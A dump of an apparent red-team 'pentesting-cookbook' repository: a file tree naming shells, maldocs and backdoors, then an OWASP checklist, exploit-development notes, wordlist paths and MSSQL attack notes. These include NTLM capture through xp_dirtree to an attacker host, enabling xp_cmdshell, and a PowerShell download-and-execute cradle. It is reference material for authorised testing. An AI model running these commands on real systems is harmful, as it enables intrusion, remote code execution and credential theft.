├── .gitignore ├── Notes.Checklist.txt ├── Notes.Exploits.txt ├── Notes.Helpers.txt ├── Notes.Wordlists.txt ├── README.md ├── Target.Host.OS.Linux.txt ├── Target.Host.OS.Shells.txt ├── Target.Host.OS.Windows.txt ├── Target.Host.Service.AD.txt ├── Target.Host.Service.AMQP.txt ├── Target.Host.Service.DB.MSSQL.txt ├── Target.Host.Service.DB.MySQL.txt ├── Target.Host.Service.DB.PostgreSQL.txt ├── Target.Host.Service.FTP.txt ├── Target.Host.Service.HTTP.txt ├── Target.Host.Service.IDENT.txt ├── Target.Host.Service.LDAP.txt ├── Target.Host.Service.MSRPC.txt ├── Target.Host.Service.NFS.txt ├── Target.Host.Service.POP3.txt ├── Target.Host.Service.RDP.txt ├── Target.Host.Service.RPC.txt ├── Target.Host.Service.SMB.txt ├── Target.Host.Service.SMTP.txt ├── Target.Host.Service.SNMP.txt ├── Target.Host.Service.SSH.txt ├── Target.Host.Service.TELNET.txt ├── Target.Host.Service.VNC.txt ├── Target.Host.Service.X11.txt ├── Target.Network.Pivoting.txt ├── Target.Network.Scanning.txt ├── Target.Network.Wireless.txt ├── Target.Recon.DNS.txt ├── Target.Recon.Dorks.txt ├── Target.Recon.OSINT.txt ├── bin ├── direnum_combo.sh ├── dns_cnames.sh ├── dns_resolve.sh ├── dns_transfer.sh ├── download_files.sh ├── download_int.sh ├── ftp_server.py ├── hexdecode.py ├── hexreverse.py ├── http_codes.sh ├── httpd.py ├── mac_oui.sh ├── mitm_toolkit.py ├── parse_gnmap.sh ├── ping.py ├── ping.sh ├── quote.py ├── scan_top.sh ├── snmp_enum.sh ├── snmp_public_hosts.sh ├── ssh_enum_malform.py ├── ssh_enum_time.py ├── tomcat_brute.py ├── vba_format.py ├── vbe_decoder.py └── xor.py └── snippets ├── html └── smuggling.html ├── java ├── shells │ ├── reverse │ │ ├── reverse.jsp │ │ ├── reverse_bash.java │ │ └── reverse_php.java │ └── web │ │ └── webshell.jsp └── utils │ └── jenkins_console.groovy ├── linux ├── backdoors │ ├── ssh_reconnect.sh │ ├── suid_popen.c │ └── suid_shell.c ├── maldocs │ └── runner-1.c ├── shells │ ├── bind │ │ └── udp.sh │ └── reverse │ │ ├── reverse.c │ │ └── reverse.pl └── utils │ ├── 
bruteforce.sh │ ├── ld_preload.c │ ├── persistence.py │ ├── port_scanning1.sh │ ├── ps_monitoring.sh │ ├── python_pickle.py │ └── so_injection.c ├── php └── recursive_dir.php ├── python └── port_scanning.py ├── windows ├── maldocs │ ├── downloader-1.cs │ ├── downloader-1.js │ ├── downloader-1.ps1 │ ├── downloader-1.vba │ ├── downloader-1.vbs │ ├── downloader-1.xls │ ├── downloader-2.js │ ├── downloader-2.vba │ ├── evasion-1.cs │ ├── evasion-1.hta │ ├── evasion-1.inf │ ├── evasion-1.sct │ ├── evasion-1.url │ ├── evasion-1.wsf │ ├── evasion-2.hta │ ├── evasion-2.inf │ ├── evasion-2.sct │ ├── evasion-msxml.xml │ ├── evasion-msxml.xsl │ ├── ntlm-1.url │ ├── ntlm-evasion-mssql-1.csproj │ ├── runner-1.cs │ ├── runner-1.ps1 │ └── runner-1.vba ├── shells │ ├── bind │ │ ├── PortListener.ps1 │ │ ├── web1.asp │ │ ├── web2.asp │ │ ├── web3.asp │ │ └── web4.aspx │ └── reverse │ │ ├── reverse1.bat │ │ ├── reverse1.cpp │ │ ├── reverse1.cs │ │ ├── reverse1.ps1 │ │ ├── reverse2.cpp │ │ ├── reverse2.ps1 │ │ └── reverse_dll.c └── utils │ ├── DomainPasswordSpray.ps1 │ ├── Enable-Privilege.ps1 │ ├── GrabAndRun.ps1 │ ├── Invoke-Mimikatz-latest.ps1 │ ├── PortScanning.ps1 │ ├── Self-Elevate.ps1 │ ├── SharingIsCaring.ps1 │ ├── Start-WebServer.ps1 │ ├── SuperPing.ps1 │ ├── Win10FirewallRules.ps1 │ ├── WindowsEnum.ps1 │ ├── base64.vbs │ ├── ftp.bat │ ├── icacls.bat │ ├── info.aspx │ ├── mimikatz-Invoke-Mimikatz-obfuscate.sh │ ├── mimikatz-clone-obfuscated.sh │ ├── minidump.cs │ ├── run_bat.c │ ├── run_dll1.c │ ├── run_dll2.cpp │ ├── runas1.bat │ ├── runas2.bat │ ├── schcheck.bat │ ├── tcpwrecovery.py │ ├── update_invoke_mimikatz.py │ ├── useradd.c │ ├── wget_ps1.bat │ ├── wget_vbs.bat │ └── winscppassword.py └── xml └── xee.txt /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | -------------------------------------------------------------------------------- /Notes.Checklist.txt: 
-------------------------------------------------------------------------------- 1 | -- Source: https://github.com/0xRadi/OWASP-Web-Checklist 2 | 3 | `` Steps 4 | 5 | - Malware Injection (Spear-Phish, Web Exploits, etc) 6 | - Reconnaissance (Internal) 7 | - Credential Theft 8 | - Exploitation & Privilege Escalation 9 | - Data Access & Exfiltration 10 | - Persistence (retaining access) 11 | 12 | `` Persistence 13 | 14 | - Process injection 15 | - Binary patching 16 | - Valid user accounts 17 | - Vulnerable script code 18 | - Avoid port binding 19 | - Use AT to run your commands 20 | - Good rootkit 21 | - Be noisy on one to divert attention from another 22 | - Change strategies to match environment's normal behavior 23 | 24 | `` Reconnaissance 25 | 26 | - Manually explore the site 27 | - Spider/crawl for missed or hidden content 28 | - Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store 29 | - Check the caches of major search engines for publicly accessible sites 30 | - Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler) 31 | - Perform Web Application Fingerprinting 32 | - Identify technologies used 33 | - Identify user roles 34 | - Identify application entry points 35 | - Identify client-side code 36 | - Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services) 37 | - Identify co-hosted and related applications 38 | - Identify all hostnames and ports 39 | - Identify third-party hosted content 40 | 41 | `` Configuration 42 | 43 | - Check for commonly used application and administrative URLs 44 | - Check for old, backup and unreferenced files 45 | - Check HTTP methods supported and Cross Site Tracing (XST) 46 | - Test file extensions handling 47 | - Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS) 48 | - Test for policies (e.g. 
Flash, Silverlight, robots) 49 | - Test for non-production data in live environment, and vice-versa 50 | - Check for sensitive data in client-side code (e.g. API keys, credentials) 51 | 52 | `` Transmission 53 | 54 | - Check SSL Version, Algorithms, Key length 55 | - Check for Digital Certificate Validity (Duration, Signature and CN) 56 | - Check that credentials are only delivered over HTTPS 57 | - Check that the login form is delivered over HTTPS 58 | - Check that session tokens are only delivered over HTTPS 59 | - Check if HTTP Strict Transport Security (HSTS) is in use 60 | 61 | `` Authentication 62 | 63 | - Test for user enumeration 64 | - Test for authentication bypass 65 | - Test for bruteforce protection 66 | - Test password quality rules 67 | - Test "remember me" functionality 68 | - Test for autocomplete on password forms/input 69 | - Test password reset and/or recovery 70 | - Test password change process 71 | - Test CAPTCHA 72 | - Test multi-factor authentication 73 | - Test for logout functionality presence 74 | - Test for cache management on HTTP (e.g. Pragma, Expires, Max-age) 75 | - Test for default logins 76 | - Test for user-accessible authentication history 77 | - Test for out-of-channel notification of account lockouts and successful password changes 78 | - Test for consistent authentication across applications with shared authentication schema / SSO 79 | 80 | `` Sessions 81 | 82 | - Establish how session management is handled in the application (e.g. tokens in cookies, token in URL) 83 | - Check session tokens for cookie flags (httpOnly and secure) 84 | - Check session cookie scope (path and domain) 85 | - Check session cookie duration (expires and max-age) 86 | - Check session termination after a maximum lifetime 87 | - Check session termination after relative timeout 88 | - Check session termination after logout 89 | - Test to see if users can have multiple simultaneous sessions 90 | - Test session cookies for randomness 91 | - Confirm that new session tokens are 
issued on login, role change and logout 92 | - Test for consistent session management across applications with shared session management 93 | - Test for session puzzling 94 | - Test for CSRF and clickjacking 95 | 96 | `` Authorization 97 | 98 | - Test for path traversal 99 | - Test for bypassing authorization schema 100 | - Test for vertical Access control problems (a.k.a. Privilege Escalation) 101 | - Test for horizontal Access control problems (between two users at the same privilege level) 102 | - Test for missing authorization 103 | 104 | `` Validation 105 | 106 | - Test for Reflected Cross Site Scripting 107 | - Test for Stored Cross Site Scripting 108 | - Test for DOM based Cross Site Scripting 109 | - Test for Cross Site Flashing 110 | - Test for HTML Injection 111 | - Test for SQL Injection 112 | - Test for LDAP Injection 113 | - Test for ORM Injection 114 | - Test for XML Injection 115 | - Test for XXE Injection 116 | - Test for SSI Injection 117 | - Test for XPath Injection 118 | - Test for XQuery Injection 119 | - Test for IMAP/SMTP Injection 120 | - Test for Code Injection 121 | - Test for Expression Language Injection 122 | - Test for Command Injection 123 | - Test for Overflow (Stack, Heap and Integer) 124 | - Test for Format String 125 | - Test for incubated vulnerabilities 126 | - Test for HTTP Splitting/Smuggling 127 | - Test for HTTP Verb Tampering 128 | - Test for Open Redirection 129 | - Test for Local File Inclusion 130 | - Test for Remote File Inclusion 131 | - Compare client-side and server-side validation rules 132 | - Test for NoSQL injection 133 | - Test for HTTP parameter pollution 134 | - Test for auto-binding 135 | - Test for Mass Assignment 136 | - Test for NULL/Invalid Session Cookie 137 | 138 | `` Denial of Service 139 | 140 | - Test for anti-automation 141 | - Test for account lockout 142 | - Test for HTTP protocol DoS 143 | - Test for SQL wildcard DoS 144 | 145 | `` Business Logic 146 | 147 | - Test for feature misuse 148 | - Test 
for lack of non-repudiation 149 | - Test for trust relationships 150 | - Test for integrity of data 151 | - Test segregation of duties 152 | 153 | `` Cryptography 154 | 155 | - Check if data which should be encrypted is not 156 | - Check for wrong algorithms usage depending on context 157 | - Check for weak algorithms usage 158 | - Check for proper use of salting 159 | - Check for randomness functions 160 | 161 | `` File Uploads 162 | 163 | - Test that acceptable file types are whitelisted 164 | - Test that file size limits, upload frequency and total file counts are defined and are enforced 165 | - Test that file contents match the defined file type 166 | - Test that all file uploads have Anti-Virus scanning in-place. 167 | - Test that unsafe filenames are sanitised 168 | - Test that uploaded files are not directly accessible within the web root 169 | - Test that uploaded files are not served on the same hostname/port 170 | - Test that files and other media are integrated with the authentication and authorisation schemas 171 | 172 | `` Payments 173 | 174 | - Test for known vulnerabilities and configuration issues on Web Server and Web Application 175 | - Test for default or guessable password 176 | - Test for non-production data in live environment, and vice-versa 177 | - Test for Injection vulnerabilities 178 | - Test for Buffer Overflows 179 | - Test for Insecure Cryptographic Storage 180 | - Test for Insufficient Transport Layer Protection 181 | - Test for Improper Error Handling 182 | - Test for all vulnerabilities with a CVSS v2 score > 4.0 183 | - Test for Authentication and Authorization issues 184 | - Test for CSRF 185 | 186 | `` HTML 5 187 | 188 | - Test Web Messaging 189 | - Test for Web Storage SQL injection 190 | - Check CORS implementation 191 | - Check Offline Web Application 192 | -------------------------------------------------------------------------------- /Notes.Exploits.txt: 
-------------------------------------------------------------------------------- 1 | `` Fuzzing 2 | 3 | # TODO: Upload phazz sources 4 | 5 | ~$ phazz.py fuzz -h VAR_TARGET_HOST -p 69 -n 100 -l 3000 -s tftp:read -m char -d 6 | ~$ phazz.py fuzz -h VAR_TARGET_HOST -p 80 -n 100 -l 3000 -s http:get -m ascii -d 7 | 8 | `` Debuggers 9 | 10 | `` ASLR check 11 | 12 | ~$ cat /proc/sys/kernel/randomize_va_space 13 | 14 | `` Binary security check 15 | 16 | ~$ checksec 17 | 18 | `` Disassembling 19 | 20 | ~$ echo -ne '\xd3\xfe\x86\x7c' | ndisasm -b32 - 21 | 22 | `` Payloads 23 | 24 | `` Test string (2700) 25 | 26 | test_payload = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7
Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9' 27 | 28 | `` Bad characters 29 | 30 | bad_characters = ( 31 | '\x00' 32 | '\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10' 33 | '\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20' 34 | '\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30' 35 | '\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40' 36 | '\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50' 37 | '\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60' 38 | '\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70' 39 | '\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80' 40 | 
'\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90' 41 | '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0' 42 | '\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0' 43 | '\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0' 44 | '\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0' 45 | '\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0' 46 | '\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0' 47 | '\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' 48 | ) 49 | 50 | http = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40" 51 | generic = "\x00\x0a\x0d\xff" 52 | ftp = "\x00\x0a\x0d\x2f\x5c" 53 | 54 | `` Pattern 55 | 56 | ~$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000 57 | 58 | ~$ phazz.py pattern -m ascii -l 2000 59 | 60 | `` Offset 61 | 62 | ~$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2000 -q 68433568 63 | 64 | ~$ phazz.py pattern -m ascii -l 2000 -q 68433568 65 | 66 | `` nasm 67 | 68 | ~$ /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 69 | nasm > jmp eax 70 | -------------------------------------------------------------------------------- /Notes.Wordlists.txt: -------------------------------------------------------------------------------- 1 | `` Passwords 2 | 3 | `` Fast bruteforcing with typical combinations and top lists 4 | 5 | - ~/lib/brutas/brutas-passwords-1-xxs.txt 6 | - /usr/share/seclists/Passwords/probable-v2-top1575.txt 7 | - /usr/share/seclists/Passwords/Common-Credentials/500-worst-passwords.txt 8 | 9 | `` Medium-weight, may generate too much traffic 10 | 11 | - ~/lib/brutas/brutas-passwords-2-xs.txt 12 | - ~/lib/brutas/brutas-passwords-3-s.txt 13 | - /usr/share/seclists/Passwords/probable-v2-top12000.txt 14 | - /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt 15 | 16 | `` Heavy lists suitable for offline bruteforcing (> 300k) 17 | 18 | - 
~/lib/brutas/brutas-passwords-4-m.txt 19 | - ~/lib/brutas/brutas-passwords-5-l.txt 20 | - ~/lib/brutas/brutas-passwords-6-xl.txt 21 | - /usr/share/seclists/Passwords/Leaked-Databases/md5decryptor-uk.txt 22 | 23 | `` Usernames 24 | 25 | - ~/lib/brutas/brutas-usernames-small.txt 26 | - ~/lib/brutas/brutas-usernames.txt 27 | - /usr/share/seclists/Usernames/top-usernames-shortlist.txt 28 | - /usr/share/wordlists/metasploit/unix_users.txt 29 | - /usr/share/seclists/Usernames/Names/names.txt 30 | 31 | `` Domains 32 | 33 | `` Light (< 4k) 34 | 35 | - ~/lib/brutas/brutas-subdomains-1-small.txt 36 | - /usr/share/seclists/Discovery/DNS/namelist.txt 37 | - /usr/share/dnsenum/dns.txt 38 | 39 | `` Heavy (> 100k) 40 | 41 | - ~/lib/brutas/brutas-subdomains-2-large.txt 42 | - /usr/share/seclists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt 43 | - /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 44 | - /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt 45 | 46 | `` Ports 47 | 48 | - ~/lib/brutas/brutas-ports-tcp-http.txt 49 | - ~/lib/brutas/brutas-ports-tcp-public.txt 50 | - ~/lib/brutas/brutas-ports-tcp-internal.txt 51 | - /usr/share/seclists/Discovery/Infrastructure/nmap-top1000-ports.txt 52 | 53 | `` HTTP paths 54 | 55 | - ~/lib/brutas/brutas-http-paths.txt 56 | - /usr/share/dirb/wordlists/common.txt 57 | - /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt 58 | - /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 59 | - /usr/share/wfuzz/wordlist/vulns/cgis.txt 60 | - /usr/share/seclists/Discovery/Web-Content/CGIs.txt 61 | - /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt 62 | - /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt 63 | 64 | `` HTTP parameters 65 | 66 | - ~/lib/brutas/brutas-http-params.txt 67 | - /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt 68 | 69 | -------------------------------------------------------------------------------- 
/README.md: -------------------------------------------------------------------------------- 1 | # pentesting-cookbook 2 | 3 | > A set of recipes useful in pentesting and red teaming scenarios 4 | 5 | Snippets, code samples and hints used in penetration tests, stored in a single repository so they can be quickly accessed and searched during assessments. 6 | 7 | ## Structure 8 | 9 | - `bin` Handy utilities to be run locally 10 | - `snippets` All things useful to be run remotely, code snippets, examples etc 11 | - `Notes.*` All sorts of helpers, lists and notes not necessarily related to a specific service or stage 12 | - `Target.Host.OS.*` - Things that can be done once a foothold is established 13 | - `Target.Host.Service.*` - Commands useful in enumeration and exploitation of a particular service 14 | - `Target.Network.*` - Commands related to scanning and moving around networks 15 | - `Target.Recon.*` - Typical recon like DNS enumeration, OSINT etc. 16 | 17 | ## Formatting rules 18 | 19 | * If there are more than three levels of hierarchy the file needs to be split. 20 | * Sources (scripts) are located in the `snippets` directory (referenced by `@`). 
21 | * Conventions: 22 | * `~` commands 23 | * `@` file references 24 | * `-` lists 25 | * `--` comments (above the commented line) 26 | * OS specific commands: 27 | * `~$` (Linux, defaults to Bash) 28 | * `~#` (Linux - root required) 29 | * `~>` (Windows) 30 | * Shell specific commands: 31 | * `~PS>` (Powershell) 32 | * Variables: 33 | * `VAR_ATTACKER_HOST` 34 | * `VAR_ATTACKER_PORT` 35 | * `VAR_TARGET_DOMAIN` 36 | * `VAR_TARGET_HOST` 37 | * `VAR_TARGET_PORT` 38 | * `VAR_TARGET_CIDR` 39 | * `VAR_TARGET_RANGE` 40 | * `VAR_TARGET_FILE` 41 | * `VAR_USERNAME` 42 | * `VAR_PASSWORD` 43 | * `VAR_NT_HASH` 44 | * `VAR_LM_HASH` (blank LM hash: aad3b435b51404eeaad3b435b51404ee) 45 | * `VAR_STRING` 46 | * `VAR_INTEGER` 47 | * `VAR_HEX` 48 | * `VAR_WORDLIST` 49 | * `VAR_WORDLIST_*` (`VAR_WORDLIST_USERNAME`, `VAR_WORDLIST_PASSWORD` etc) 50 | * `VAR_*_HOST` (`VAR_FTP_HOST`, `VAR_ZOMBIE_HOST`, `VAR_PROXY_HOST` etc) 51 | -------------------------------------------------------------------------------- /Target.Host.Service.AMQP.txt: -------------------------------------------------------------------------------- 1 | `` RabbitMQ 2 | 3 | ~$ nmap -Pn -sV -p 5672 --script amqp-info VAR_TARGET_HOST 4 | -------------------------------------------------------------------------------- /Target.Host.Service.DB.MSSQL.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap VAR_TARGET_HOST -v -p 1433 -sV -Pn -vv --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password,ms-sql-tables 4 | 5 | `` Password Bruteforcing 6 | 7 | ~$ nmap -p 1433 --script ms-sql-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST 8 | ~$ hydra -L VAR_WORDLIST_USER -V -P VAR_WORDLIST_PASSWORD VAR_TARGET_HOST mssql 9 | 10 | `` TDS Versions 11 | 12 | - 7.0 13 | - SQL Server 7.0 14 | - 7.1 15 | - SQL Server 2000 16 | - 7.1 Revision 1 17 | - SQL Server 2000 SP1 18 | - 7.2 19 | - SQL Server 2005 20 | - 7.3.A 21 | - SQL Server 
2008 22 | - 7.3.B 23 | - SQL Server 2008 R2 24 | - 7.4 25 | - SQL Server 2012 26 | - SQL Server 2014 27 | - SQL Server 2016 28 | - SQL Server 2017 29 | - SQL Server 2019 30 | 31 | `` Remote console 32 | 33 | ~$ vim ~/.sqshrc 34 | ~$ sqsh -S mssql1 35 | 36 | `` Capturing NTLM 37 | 38 | > EXEC master..xp_dirtree "\\VAR_ATTACKER_HOST\\test"; 39 | 40 | `` Change sa password 41 | 42 | ~> net stop MSSQL$SQLEXPRESS 43 | ~> net start MSSQL$SQLEXPRESS /m sqlcmd 44 | ~> sqlcmd 45 | > ALTER LOGIN [sa] WITH DEFAULT_DATABASE=[master] 46 | > GO 47 | > USE [master] 48 | > GO 49 | > ALTER LOGIN [sa] WITH CHECK_POLICY = OFF; 50 | > GO 51 | > ALTER LOGIN [sa] WITH PASSWORD=N'sa'; 52 | > GO 53 | ~> net stop MSSQL$SQLEXPRESS 54 | ~> net start MSSQL$SQLEXPRESS 55 | 56 | `` Linked servers 57 | 58 | `` List 59 | 60 | > EXEC sp_linkedservers; 61 | 62 | `` Execute on linked server 63 | 64 | > SELECT version FROM OPENQUERY("VAR_TARGET_HOST", 'SELECT @@version AS version') 65 | 66 | `` Remote execution 67 | 68 | > EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT VAR_TARGET_HOST 69 | > EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT VAR_TARGET_HOST 70 | > EXEC ('xp_cmdshell ''whoami'';') AT VAR_TARGET_HOST 71 | 72 | `` With metasploit 73 | 74 | > use auxiliary/admin/mssql/mssql_sql 75 | > set USERNAME VAR_USERNAME 76 | > set PASSWORD VAR_PASSWORD 77 | > set DOMAIN VAR_DOMAIN 78 | > set USE_WINDOWS_AUTHENT yes 79 | > set RHOSTS VAR_TARGET_HOST 80 | > set SQL "EXEC master..xp_dirtree '\\\\VAR_ATTACKER_HOST\\test'" 81 | > run 82 | 83 | `` xp_cmdshell 84 | 85 | `` The basic approach 86 | 87 | > exec sp_configure "show advanced options", 1 88 | > reconfigure 89 | > exec sp_configure "xp_cmdshell", 1 90 | > reconfigure 91 | > xp_cmdshell "whoami" 92 | 93 | `` Download and execute PowerShell 94 | 95 | > xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://VAR_TARGET_HOST/script.ps1\");" 96 | 97 | `` wget.vbs 98 | 99 | xp_cmdshell 'echo strUrl = 
